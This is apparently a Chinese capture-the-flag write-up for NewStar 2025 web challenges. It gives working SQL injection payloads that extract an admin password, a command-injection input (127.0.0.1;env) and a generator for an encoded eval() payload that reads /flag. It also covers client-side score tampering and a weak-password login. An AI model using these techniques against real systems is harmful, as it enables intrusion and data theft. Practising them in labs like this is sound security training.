2025-newstar


week1

multi-headach3

根据提示先访问robots.txt,得/hidden.php,然后抓包发包flag在响应头

image-20251003095906858

strange_login

考点:报错注入

简单测试发现是单引号闭合,而且页面会把 SQL 错误信息直接回显出来,所以用 updatexml() 报错注入即可。

1'/**/or/**/updatexml(1,concat('~',(select/**/database())),1)#
image-20251003102551946
1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())),1)#
image-20251003102629802
1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="users")),1)#
image-20251003102706312

分别查了各个字段都没有 flag;题目提示用 admin 登录,显然是要先拿到 admin 的密码,再登录取 flag。

1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(password)/**/from/**/`users`)),1)#

得到 a7f8d9e2b3c4f5a6b7c8d9e0f1a2b3c,但用它登录不对。原因是 updatexml() 的报错回显最多只有 32 个字符,前缀 `~` 又占了 1 位,所以 32 位的密码只显示出前 31 位。解决办法是用 mid() 分段查询:先查第 1-10 位,再查第 11-20 位,以此类推,直到拼出完整密码。

1'/**/or/**/updatexml(1,concat('~',mid((select/**/group_concat(password)/**/from/**/`users`),1,10)),1)#

分段查了三次,得到 a7f8d9e2b3、c4f5a6b7c8d9e0f1a2b3、d9e0f1a2b3c4,第三段与前面有重叠,去重拼接后密码是 a7f8d9e2b3c4f5a6b7c8d9e0f1a2b3c4(直接查 password 时正好被截掉了最后一个 4)。用 admin 和这个密码登录即可拿到 flag。

黑客小W的故事(1)

根据提示抓包,发现 count=1 时每次发包加 16,count=2 时加 32,增量完全由客户端参数控制,直接把 count 改成 100 发一次包就过了。

image-20251003112904304

把响应里的 token 替换到下一关的请求中。下一关页面提示 shipin=mogubaozi,并且需要 POST 传参;参数名试了几个,值就是第二关开始对话时给出的 guding,之后响应提示要改用 DELETE 方法。

image-20251003115153909

宇宙的中心是php

考点:intval性质

查看网页源码可以找到 s3kret.php:

<?php
highlight_file(__FILE__);
include "flag.php";  // presumably sets $flag (echoed below); not visible here
if(isset($_POST['newstar2025'])){
    $answer = $_POST['newstar2025'];
    // The same string is parsed twice: intval($answer) uses base 10 and reads
    // only the leading decimal digits, while intval($answer, 0) detects a
    // prefix ("0x" -> hex, leading "0" -> octal). A plain "47" fails the first
    // test; "0x2f" (base 10 -> 0) or "057" (base 10 -> 57) pass both.
    if(intval($answer)!=47&&intval($answer,0)==47){
        echo $flag;
    }else{
        echo "你还未参透奥秘";
    }
}

条件是:按十进制解析 != 47,而按 base 0 解析 == 47。intval($s, 0) 会根据前缀自动识别进制(0x 开头按十六进制,0 开头按八进制),所以传 0x2f 或 057 即可:十进制解析分别得到 0 和 57,base 0 解析都得到 47。

image-20251003211027519

输入是字符串时,intval($s) 默认按十进制只读取开头的数字部分(遇到 x 就停止),所以 0x2f 变成 0、057 变成 57;只有显式传 base=0 时才会识别 0x/0 前缀。

PHP intval() 函数 | 菜鸟教程

别笑,你也过不了第二关

审计 JS 代码,其实就是改分数(分数只是一个前端变量):

image-20251003211901238

// Run from the browser console: the score is plain client-side state, so it
// can be overwritten directly; the DOM text is refreshed to match.
score = 1000000; // set the score directly
scoreEl.innerText = "分数: " + score;

分数够了之后访问 flag.php,再把分数 POST 过去即可——服务端直接信任客户端提交的 score 值:

score=1000000 (具体数值取决于通关时的分数)

image-20251003212024144

image-20251003211828579

我真得控制你了

审计js代码,想按按钮没成功,那就直接伪造发包

image-20251003214411239

下一关用弱口令 admin/111111 即可登录绕过。

<?php
error_reporting(0);  // hides every notice/warning, including the undefined $flag_secret used further down

function generate_dynamic_flag($secret) {
    // $secret is unused: the flag comes straight from the ICQ_FLAG environment
    // variable, with a placeholder when it is unset or empty.
    return getenv("ICQ_FLAG") ?: 'default_flag';
}


if (isset($_GET['newstar'])) {
    $input = $_GET['newstar'];
    
    // Array input (newstar[]=...) is refused before the string checks below.
    if (is_array($input)) {
        die("恭喜掌握新姿势");
    }
    

    // Whitelist: only digits, * / ~, parentheses and whitespace may appear.
    // Letters, $, quotes, + and - are all rejected, so no names or variables.
    if (preg_match('/[^\d*\/~()\s]/', $input)) {
        die("老套路了,行不行啊");
    }
    

    // A bare number (digits/whitespace only) is rejected; an operator is required.
    if (preg_match('/^[\d\s]+$/', $input)) {
        die("请输入有效的表达式");
    }
    
    $test = 0;
    try {
        // The filtered text is still spliced into eval() unquoted; only the
        // character whitelist above keeps this from being arbitrary code execution.
        @eval("\$test = $input;");
    } catch (Error $e) {
        die("表达式错误");
    }
    
    // Loose comparison: any int or float value == 2025 is accepted.
    if ($test == 2025) {
        // $flag_secret is never assigned in this listing (notice silenced above);
        // the argument is unused by generate_dynamic_flag anyway.
        $flag = generate_dynamic_flag($flag_secret);
        echo "<div class='success'>拿下flag!</div>";
        echo "<div class='flag-container'><div class='flag'>FLAG: {$flag}</div></div>";
    } else {
        echo "<div class='error'>大哥哥泥把数字算错了: $test ≠ 2025</div>";
    }
} else {
    ?>
<?php } ?>

代码限制

不能是数组:is_array($input) 必须为 false
字符限制:只能包含 \d*\/~()\s(数字、*/~、括号、空格)
不能纯数字:preg_match('/^[\d\s]+$/', $input) 必须为 false
目标:$test 必须等于 2025

限制只是禁止纯数字,乘号和除号仍然可用,所以随便写一个值为 2025 的表达式即可:

2025*1		//	2025/1

week2

DD加速器

典型的命令注入:输入 127.0.0.1;env 即可,flag 在环境变量里。

image-20251007143627000

白帽小K的故事(1)

搞点哦润吉吃吃橘

image-20251007160143196

image-20251007160159396

根据提示发现,必须用 start_challenge 响应 Set-Cookie 里下发的新 session 去请求 verify_token(token 与下发它的 session 绑定),所以写个脚本:拿到新 session,提取响应里的 token 计算式,算出结果后提交。计算式来自服务端,属于不可信输入,求值时应避免直接 eval。

import ast
import operator

import requests

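#: Operators the server-supplied token expression may use (nothing else).
_ARITH_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
    ast.USub: operator.neg,
    ast.UAdd: operator.pos,
}


def _eval_arithmetic(expr):
    """Evaluate a numeric expression without eval().

    Only int/float literals, the binary operators in _ARITH_OPS and unary
    +/- are accepted; names, calls, attributes, comparisons etc. raise
    ValueError. The expression comes from the challenge server, i.e. it is
    untrusted input, so it must never reach eval().

    Args:
        expr: the text after ``"token ="``, e.g. ``"(3 + 4) * 5"``.

    Returns:
        The numeric value of the expression.

    Raises:
        ValueError: on any construct outside the allow-list, or an absurdly
            large exponent (cheap DoS from a hostile server).
        SyntaxError: if the text is not a valid Python expression.
    """

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (
            isinstance(node, ast.Constant)
            and isinstance(node.value, (int, float))
            and not isinstance(node.value, bool)
        ):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _ARITH_OPS:
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > 1000:
                raise ValueError(f"exponent too large: {right}")
            return _ARITH_OPS[type(node.op)](left, right)
        if isinstance(node, ast.UnaryOp) and type(node.op) in _ARITH_OPS:
            return _ARITH_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported expression element: {ast.dump(node)}")

    return walk(ast.parse(expr, mode="eval"))


def auto_challenge():
    """Run one start_challenge -> verify_token round and print the reply.

    /start_challenge answers with a JSON body whose ``"expression"`` field has
    the form ``"token = <arithmetic>"`` and issues a fresh ``session`` cookie.
    /verify_token only accepts the computed token under that new cookie, so
    each request here carries exactly one explicitly chosen session cookie
    (no cookie jar, so the login cookie and the new one can never be sent
    together).

    The expression is evaluated with _eval_arithmetic rather than eval().

    Returns:
        None. The /verify_token body is printed on success; every failure is
        reported with its reason instead of returning silently.
    """
    # No trailing slash: the paths are joined with "/..." below.
    base_url = "https://eci-2ze9i5ld3m7d7x4xrtqn.cloudeci1.ichunqiu.com:5000"
    # Cookie of an already logged-in session on this instance (captured from
    # the browser); it has to be replaced whenever the instance is redeployed.
    login_session = "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiRG9ybyJ9.aOTHvQ.b-mL3B7omr-6O1FRTNHSXya64GM"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
        "Content-Type": "application/json",
    }
    timeout = 10  # seconds; without one a stalled server hangs the script forever

    try:
        start_response = requests.post(
            f"{base_url}/start_challenge",
            headers=headers,
            cookies={"session": login_session},
            timeout=timeout,
        )
        if start_response.status_code != 200:
            print(f"start_challenge 失败: HTTP {start_response.status_code}")
            return

        # The token is bound to the session issued alongside it, so the
        # Set-Cookie of this response (already parsed by requests) is required.
        new_session = start_response.cookies.get("session")
        if not new_session:
            print("start_challenge 没有下发新的 session cookie")
            return

        start_data = start_response.json()
        if "error" in start_data:
            print(f"start_challenge 错误: {start_data['error']}")
            return

        expression = start_data.get("expression", "")
        _, marker, calc_expr = expression.partition("token =")
        if not marker or not calc_expr.strip():
            print(f"响应中没有 token 表达式: {expression!r}")
            return

        token = _eval_arithmetic(calc_expr.strip())

        submit_response = requests.post(
            f"{base_url}/verify_token",
            headers=headers,
            cookies={"session": new_session},
            json={"token": int(token)},
            timeout=timeout,
        )
        print(submit_response.text)

    except (requests.RequestException, ValueError, SyntaxError, ArithmeticError) as e:
        print(f"错误: {e}")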

if __name__ == "__main__":
    # Script entry point: one challenge round, result printed to stdout.
    auto_challenge()

真的是签到诶

<?php
highlight_file(__FILE__);  // the source is disclosed on every request

// Attacker-controlled input: the POST parameter `cipher` (empty string when absent).
$cipher = $_POST['cipher'] ?? '';

function atbash($text) {
  // Map each ASCII letter to its mirror in the alphabet (a<->z, b<->y, ...),
  // preserving case; any non-letter byte is copied through unchanged.
  // Applying the function twice returns the input, so it is its own inverse.
  $result = '';
  foreach (str_split($text) as $char) {
    if (ctype_alpha($char)) {
      $is_upper = ctype_upper($char);
      $base = $is_upper ? ord('A') : ord('a');
      $offset = ord(strtolower($char)) - ord('a');  // 0..25 index of the letter
      $new_char = chr($base + (25 - $offset));      // mirrored index, same case
      $result .= $new_char;
    } else {
      $result .= $char;
    }
  }
  return $result;
}

if ($cipher) {
  // Decode pipeline applied to the untrusted POST body before it is executed:
  // base64 -> atbash -> strip spaces -> rot13 -> eval. Both atbash and rot13
  // are involutions, so a payload is built by running the same two steps in
  // reverse order (rot13, then atbash) and base64-encoding the result.
  $cipher = base64_decode($cipher);
  $encoded = atbash($cipher);
  // Spaces are removed *after* atbash, so the decoded PHP must not contain any.
  $encoded = str_replace(' ', '', $encoded);
  $encoded = str_rot13($encoded);
  @eval($encoded);  // arbitrary code execution; errors are suppressed
  exit;
}

$question = "真的是签到吗?";
$answer = "真的很签到诶!";

$res =  $question . "<br>" . $answer . "<br>";
echo $res . $res . $res . $res . $res;

// NOTE(review): the closing tag below appears truncated in this listing (expected `?>`).
?

过程

Base64解码:$cipher = base64_decode($cipher);
Atbash加密:$encoded = atbash($cipher);
去除空格:$encoded = str_replace(' ', '', $encoded);
ROT13加密:$encoded = str_rot13($encoded);
代码执行:@eval($encoded);

所以逆向代码如下

<?php
// 简化版Payload生成器

function atbash($text) {
    // Mirror every ASCII letter within the alphabet (a<->z, b<->y, ...) while
    // keeping its case; any other byte is passed through untouched. Running it
    // twice yields the input again, so the same function undoes itself.
    $mapped = array_map(function ($char) {
        if (!ctype_alpha($char)) {
            return $char;
        }
        $first = ctype_upper($char) ? ord('A') : ord('a');
        $last = $first + 25;
        // ord($char) - $first is the letter's index; $last - index is its mirror.
        return chr($last - (ord($char) - $first));
    }, str_split($text));
    return implode('', $mapped);
}


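// Code to run on the target. It must not contain spaces: the target applies
// str_replace(' ', '', ...) to the decoded text before eval(), so any space
// would be stripped away (e.g. print_r(scandir('/')); to list / is fine,
// "echo 1 + 1;" is not).
$code = "show_source('/flag');";
if (strpos($code, ' ') !== false) {
    die("payload contains a space; the target strips spaces before eval()\n");
}

// The target runs base64_decode -> atbash -> str_rot13 -> eval. Both atbash
// and rot13 are their own inverse, so the payload is built by applying the same
// two transforms in reverse order and then base64-encoding the result.
$rot13_decoded = str_rot13($code);         // undo the target's final str_rot13
$atbash_decoded = atbash($rot13_decoded);  // undo the target's atbash
$payload = base64_encode($atbash_decoded); // what the target base64-decodes

echo "原始代码: $code\n";
echo "ROT13解密: $rot13_decoded\n";
echo "Atbash解密: $atbash_decoded\n";
echo "最终Payload: $payload\n";
echo "POST数据: cipher=$payload\n";

// Replay the target's pipeline to confirm the payload decodes back to $code.
echo "\n=== 验证过程 ===\n";
$test1 = base64_decode($payload);
echo "Base64解码: $test1\n";
$test2 = atbash($test1);
echo "Atbash加密: $test2\n";
$test3 = str_replace(' ', '', $test2);
echo "去除空格: $test3\n";
$test4 = str_rot13($test3);
echo "ROT13加密: $test4\n";
if ($test4 !== $code) {
    die("验证失败: 还原结果与原始代码不一致\n");
}
echo "最终执行: $test4\n";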
?>
谢谢观看